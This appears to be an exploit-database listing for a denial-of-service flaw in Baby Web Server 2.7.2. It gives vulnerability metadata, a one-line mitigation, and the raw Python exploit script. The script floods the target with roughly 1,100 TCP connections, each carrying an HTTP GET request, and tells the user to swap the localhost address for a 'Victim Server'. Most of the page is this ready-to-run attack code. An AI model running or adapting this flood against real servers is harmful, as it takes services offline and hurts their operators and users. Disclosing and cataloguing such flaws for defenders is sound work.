header-logo
Suggest Exploit
vendor:
Baby Web Server
by:
Asheesh Kumar Mani Tripathi
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Baby Web Server
Affected Version From: 2.7.2002
Affected Version To: 2.7.2002
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020

Baby Web Server 2.7.2 Vulnerbility found Denial of Service

The Baby Web Server 2.7.2 is vulnerable to a Denial of Service attack. The vulnerability lies in the server's inability to handle a large number of requests. An attacker can send a large number of requests to the server, causing it to crash.

Mitigation:

Upgrade to the latest version of Baby Web Server to mitigate this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket

print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server" 
print "unable to handle so much of  requests "
print "*****************************************************"

host = "127.0.0.1"
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",80))
   for i in range (1,1100):
       request =  "GET /some.txt HTTP/1.1 \n\n"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       print i
except:
   print "Oh! Some Problem Occured Check Server is Running or Not"